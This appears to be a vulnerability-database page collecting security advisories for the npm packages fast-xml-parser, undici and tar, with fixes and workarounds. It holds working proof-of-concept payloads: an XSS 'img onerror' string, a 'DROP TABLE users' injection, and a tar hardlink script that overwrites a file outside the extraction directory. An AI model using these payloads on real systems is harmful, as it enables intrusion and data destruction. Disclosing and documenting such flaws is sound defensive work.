const { XMLParser } = require("fast-xml-parser");

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY l. "<img src=x onerror=alert(1)>">
]>
<root>
  <text>Hello &lt;b&gt;World&lt;/b&gt;</text>
</root>`;

const result = new XMLParser().parse(xml);
console.log(result.root.text);
// Hello <img src=x onerror=alert(1)>b>World<img src=x onerror=alert(1)>/b>

No special parser options needed - processEntities: true is the default.

When an app renders result.root.text in a page (e.g. innerHTML, template interpolation, SSR), the injected <img onerror> fires.

& can be shadowed too:

const xml2 = `<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY am. "'; DROP TABLE users;--">
]>
<root>SELECT * FROM t WHERE name='O&amp;Brien'</root>`;

const r = new XMLParser().parse(xml2);
console.log(r.root);
// SELECT * FROM t WHERE name='O'; DROP TABLE users;--Brien'

Impact

This is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.

Default config, no special options
Attacker can replace any < / > / & / " / ' with arbitrary strings
Direct XSS vector when parsed XML content is rendered in a page
v5 and v6 both affected

Suggested fix

Escape regex metacharacters before constructing the replacement regex:

const escaped = entityName.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
entities[entityName] = {
    regx: RegExp(`&${escaped};`, "g"),
    val: val
};

For v6, add . to the blacklist in validateEntityName:

const specialChar = "!?\\/[].{}^&*()<>|+";

Severity

CWE-185 (Incorrect Regular Expression)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)

Entity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.

Severity ?

9.3 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.3.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "fast-xml-parser"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.1.3"
            },
            {
              "fixed": "4.5.4"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25896"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-185"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-20T18:23:54Z",
    "nvd_published_at": "2026-02-20T21:19:27Z",
    "severity": "CRITICAL"
  },
  "details": "# Entity encoding bypass via regex injection in DOCTYPE entity names\n\n## Summary\n\nA dot (`.`) in a DOCTYPE entity name is treated as a regex wildcard during entity replacement, allowing an attacker to shadow built-in XML entities (`\u0026lt;`, `\u0026gt;`, `\u0026amp;`, `\u0026quot;`, `\u0026apos;`) with arbitrary values. This bypasses entity encoding and leads to XSS when parsed output is rendered.\n\n## Details\n\nThe fix for CVE-2023-34104 addressed some regex metacharacters in entity names but missed `.` (period), which is valid in XML names per the W3C spec.\n\nIn `DocTypeReader.js`, entity names are passed directly to `RegExp()`:\n\n```js\nentities[entityName] = {\n    regx: RegExp(`\u0026${entityName};`, \"g\"),\n    val: val\n};\n```\n\nAn entity named `l.` produces the regex `/\u0026l.;/g` where `.` matches **any character**, including the `t` in `\u0026lt;`. Since DOCTYPE entities are replaced before built-in entities, this shadows `\u0026lt;` entirely.\n\nThe same issue exists in `OrderedObjParser.js:81` (`addExternalEntities`), and in the v6 codebase - `EntitiesParser.js` has a `validateEntityName` function with a character blacklist, but `.` is not included:\n\n```js\n// v6 EntitiesParser.js line 96\nconst specialChar = \"!?\\\\/[]$%{}^\u0026*()\u003c\u003e|+\";  // no dot\n```\n\n## Shadowing all 5 built-in entities\n\n| Entity name | Regex created | Shadows |\n|---|---|---|\n| `l.` | `/\u0026l.;/g` | `\u0026lt;` |\n| `g.` | `/\u0026g.;/g` | `\u0026gt;` |\n| `am.` | `/\u0026am.;/g` | `\u0026amp;` |\n| `quo.` | `/\u0026quo.;/g` | `\u0026quot;` |\n| `apo.` | `/\u0026apo.;/g` | `\u0026apos;` |\n\n## PoC\n\n```js\nconst { XMLParser } = require(\"fast-xml-parser\");\n\nconst xml = `\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE foo [\n  \u003c!ENTITY l. \"\u003cimg src=x onerror=alert(1)\u003e\"\u003e\n]\u003e\n\u003croot\u003e\n  \u003ctext\u003eHello \u0026lt;b\u0026gt;World\u0026lt;/b\u0026gt;\u003c/text\u003e\n\u003c/root\u003e`;\n\nconst result = new XMLParser().parse(xml);\nconsole.log(result.root.text);\n// Hello \u003cimg src=x onerror=alert(1)\u003eb\u003eWorld\u003cimg src=x onerror=alert(1)\u003e/b\u003e\n```\n\nNo special parser options needed - `processEntities: true` is the default.\n\nWhen an app renders `result.root.text` in a page (e.g. `innerHTML`, template interpolation, SSR), the injected `\u003cimg onerror\u003e` fires.\n\n`\u0026amp;` can be shadowed too:\n\n```js\nconst xml2 = `\u003c?xml version=\"1.0\"?\u003e\n\u003c!DOCTYPE foo [\n  \u003c!ENTITY am. \"\u0027; DROP TABLE users;--\"\u003e\n]\u003e\n\u003croot\u003eSELECT * FROM t WHERE name=\u0027O\u0026amp;Brien\u0027\u003c/root\u003e`;\n\nconst r = new XMLParser().parse(xml2);\nconsole.log(r.root);\n// SELECT * FROM t WHERE name=\u0027O\u0027; DROP TABLE users;--Brien\u0027\n```\n\n## Impact\n\nThis is a complete bypass of XML entity encoding. Any application that parses untrusted XML and uses the output in HTML, SQL, or other injection-sensitive contexts is affected.\n\n- Default config, no special options\n- Attacker can replace any `\u0026lt;` / `\u0026gt;` / `\u0026amp;` / `\u0026quot;` / `\u0026apos;` with arbitrary strings\n- Direct XSS vector when parsed XML content is rendered in a page\n- v5 and v6 both affected\n\n## Suggested fix\n\nEscape regex metacharacters before constructing the replacement regex:\n\n```js\nconst escaped = entityName.replace(/[.*+?^${}()|[\\]\\\\]/g, \u0027\\\\$\u0026\u0027);\nentities[entityName] = {\n    regx: RegExp(`\u0026${escaped};`, \"g\"),\n    val: val\n};\n```\n\nFor v6, add `.` to the blacklist in `validateEntityName`:\n\n```js\nconst specialChar = \"!?\\\\/[].{}^\u0026*()\u003c\u003e|+\";\n```\n\n## Severity\n\n**CWE-185** (Incorrect Regular Expression)\n\n**CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N - 9.3 (CRITICAL)**\n\nEntity decoding is a fundamental trust boundary in XML processing. This completely undermines it with no preconditions.",
  "id": "GHSA-m7jm-9gc2-mpf2",
  "modified": "2026-02-27T16:51:58Z",
  "published": "2026-02-20T18:23:54Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-m7jm-9gc2-mpf2"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25896"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/943ef0eb1b2d3284e72dd74f44a042ee9f07026e"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/commit/ddcd0acf26ddd682cb0dc15a2bd6aa3b96bb1e69"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser"
    },
    {
      "type": "WEB",
      "url": "https://github.com/NaturalIntelligence/fast-xml-parser/releases/tag/v5.3.5"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "fast-xml-parser has an entity encoding bypass via regex injection in DOCTYPE entity names"
}

GHSA-PHC3-FGPG-7M6H

Vulnerability from github – Published: 2026-03-13 20:37 – Updated: 2026-03-13 20:37

Summary

Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS

Details

Impact

This is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).

In vulnerable Undici versions, when interceptors.deduplicate() is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.

Impacted users are applications that use Undici’s deduplication interceptor against endpoints that may produce large or long-lived response bodies.

Patches

The issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.

Users should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.

Workarounds

If upgrading immediately is not possible:

Disable interceptors.deduplicate() for affected clients/routes.
Use skipHeaderNames with a marker header to force high-risk requests to bypass deduplication.
Avoid concurrent identical requests to untrusted endpoints that may return very large/chunked bodies.
Apply upstream/proxy response-size and timeout limits.

Severity ?

5.9 (Medium)


                  
                    CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "undici"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "7.17.0"
            },
            {
              "fixed": "7.24.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-2581"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-13T20:37:58Z",
    "nvd_published_at": "2026-03-12T21:16:25Z",
    "severity": "MODERATE"
  },
  "details": "## Impact\nThis is an uncontrolled resource consumption vulnerability (CWE-400) that can lead to Denial of Service (DoS).\n\nIn vulnerable Undici versions, when `interceptors.deduplicate()` is enabled, response data for deduplicated requests could be accumulated in memory for downstream handlers. An attacker-controlled or untrusted upstream endpoint can exploit this with large/chunked responses and concurrent identical requests, causing high memory usage and potential OOM process termination.\n\nImpacted users are applications that use Undici\u2019s deduplication interceptor against endpoints that may produce large or long-lived response bodies.\n\n## Patches\n\nThe issue has been patched by changing deduplication behavior to stream response chunks to downstream handlers as they arrive (instead of full-body accumulation), and by preventing late deduplication when body streaming has already started.\n\nUsers should upgrade to the first official Undici (and Node.js, where applicable) releases that include this patch.\n\n## Workarounds\nIf upgrading immediately is not possible:\n\n- Disable `interceptors.deduplicate()` for affected clients/routes.\n- Use `skipHeaderNames` with a marker header to force high-risk requests to bypass deduplication.\n- Avoid concurrent identical requests to untrusted endpoints that may return very large/chunked bodies.\n- Apply upstream/proxy response-size and timeout limits.",
  "id": "GHSA-phc3-fgpg-7m6h",
  "modified": "2026-03-13T20:37:58Z",
  "published": "2026-03-13T20:37:58Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nodejs/undici/security/advisories/GHSA-phc3-fgpg-7m6h"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2581"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/3513473"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nodejs/undici"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Undici has Unbounded Memory Consumption in its DeduplicationHandler via Response Buffering that leads to DoS"
}

GHSA-QFFP-2RHF-9H96

Vulnerability from github – Published: 2026-03-05 00:52 – Updated: 2026-03-09 15:49

Summary

tar has Hardlink Path Traversal via Drive-Relative Linkpath

Details

Summary

tar (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction.

Details

The extraction logic in Unpack[STRIPABSOLUTEPATH] checks for .. segments before stripping absolute roots.

What happens with linkpath: "C:../target.txt": 1. Split on / gives ['C:..', 'target.txt'], so parts.includes('..') is false. 2. stripAbsolutePath() removes C: and rewrites the value to ../target.txt. 3. Hardlink creation resolves this against extraction cwd and escapes one directory up. 4. Writing through the extracted hardlink overwrites the outside file.

This is reachable in standard usage (tar.x({ cwd, file })) when extracting attacker-controlled tar archives.

PoC

Tested on Arch Linux with tar@7.5.9.

PoC script (poc.cjs):

const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(process.cwd(), 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Run:

cd test-workspace
node poc.cjs && ls -l ../target.txt

Observed output:

PWNED
-rw-r--r-- 2 joshuavr joshuavr 6 Mar  4 19:25 ../target.txt

PWNED confirms outside file content overwrite. Link count 2 confirms the extracted file and ../target.txt are hardlinked.

Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios: - CLI tools unpacking untrusted tarballs into a working directory - build/update pipelines consuming third-party archives - services that import user-supplied tar files

Severity ?

8.2 (High)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 7.5.9"
      },
      "package": {
        "ecosystem": "npm",
        "name": "tar"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.5.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29786"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-59"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-05T00:52:32Z",
    "nvd_published_at": "2026-03-07T16:15:55Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n`tar` (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as `C:../target.txt`, which enables file overwrite outside `cwd` during normal `tar.x()` extraction.\n\n### Details\nThe extraction logic in `Unpack[STRIPABSOLUTEPATH]` checks for `..` segments *before* stripping absolute roots.\n\nWhat happens with `linkpath: \"C:../target.txt\"`:\n1. Split on `/` gives `[\u0027C:..\u0027, \u0027target.txt\u0027]`, so `parts.includes(\u0027..\u0027)` is false.\n2. `stripAbsolutePath()` removes `C:` and rewrites the value to `../target.txt`.\n3. Hardlink creation resolves this against extraction `cwd` and escapes one directory up.\n4. Writing through the extracted hardlink overwrites the outside file.\n\nThis is reachable in standard usage (`tar.x({ cwd, file })`) when extracting attacker-controlled tar archives.\n\n### PoC\nTested on Arch Linux with `tar@7.5.9`.\n\nPoC script (`poc.cjs`):\n\n```js\nconst fs = require(\u0027fs\u0027)\nconst path = require(\u0027path\u0027)\nconst { Header, x } = require(\u0027tar\u0027)\n\nconst cwd = process.cwd()\nconst target = path.resolve(cwd, \u0027..\u0027, \u0027target.txt\u0027)\nconst tarFile = path.join(process.cwd(), \u0027poc.tar\u0027)\n\nfs.writeFileSync(target, \u0027ORIGINAL\\n\u0027)\n\nconst b = Buffer.alloc(1536)\nnew Header({ path: \u0027l\u0027, type: \u0027Link\u0027, linkpath: \u0027C:../target.txt\u0027 }).encode(b, 0)\nfs.writeFileSync(tarFile, b)\n\nx({ cwd, file: tarFile }).then(() =\u003e {\n  fs.writeFileSync(path.join(cwd, \u0027l\u0027), \u0027PWNED\\n\u0027)\n  process.stdout.write(fs.readFileSync(target, \u0027utf8\u0027))\n})\n```\n\nRun:\n\n```bash\ncd test-workspace\nnode poc.cjs \u0026\u0026 ls -l ../target.txt\n```\n\nObserved output:\n\n```text\nPWNED\n-rw-r--r-- 2 joshuavr joshuavr 6 Mar  4 19:25 ../target.txt\n```\n\n`PWNED` confirms outside file content overwrite. Link count `2` confirms the extracted file and `../target.txt` are hardlinked.\n\n### Impact\nThis is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.\n\nRealistic scenarios:\n- CLI tools unpacking untrusted tarballs into a working directory\n- build/update pipelines consuming third-party archives\n- services that import user-supplied tar files",
  "id": "GHSA-qffp-2rhf-9h96",
  "modified": "2026-03-09T15:49:59Z",
  "published": "2026-03-05T00:52:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-qffp-2rhf-9h96"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29786"
    },
    {
      "type": "WEB",
      "url": "https://github.com/isaacs/node-tar/commit/7bc755dd85e623c0279e08eb3784909e6d7e4b9f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/isaacs/node-tar"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L",
      "type": "CVSS_V4"
    }
  ],
  "summary": "tar has Hardlink Path Traversal via Drive-Relative Linkpath"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

Vulnerability from cleanstart

Impact

Patches

Workarounds

Resources

Impact

Patches

Workarounds

Impact

Patches

Workarounds

Impact

Patches

Workarounds

Impact

Patches

Workarounds

References

Summary

Details

PoC

Impact

Workaround

Entity encoding bypass via regex injection in DOCTYPE entity names

Summary

Details

Shadowing all 5 built-in entities

PoC

Impact

Suggested fix

Severity

Impact

Patches

Workarounds

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature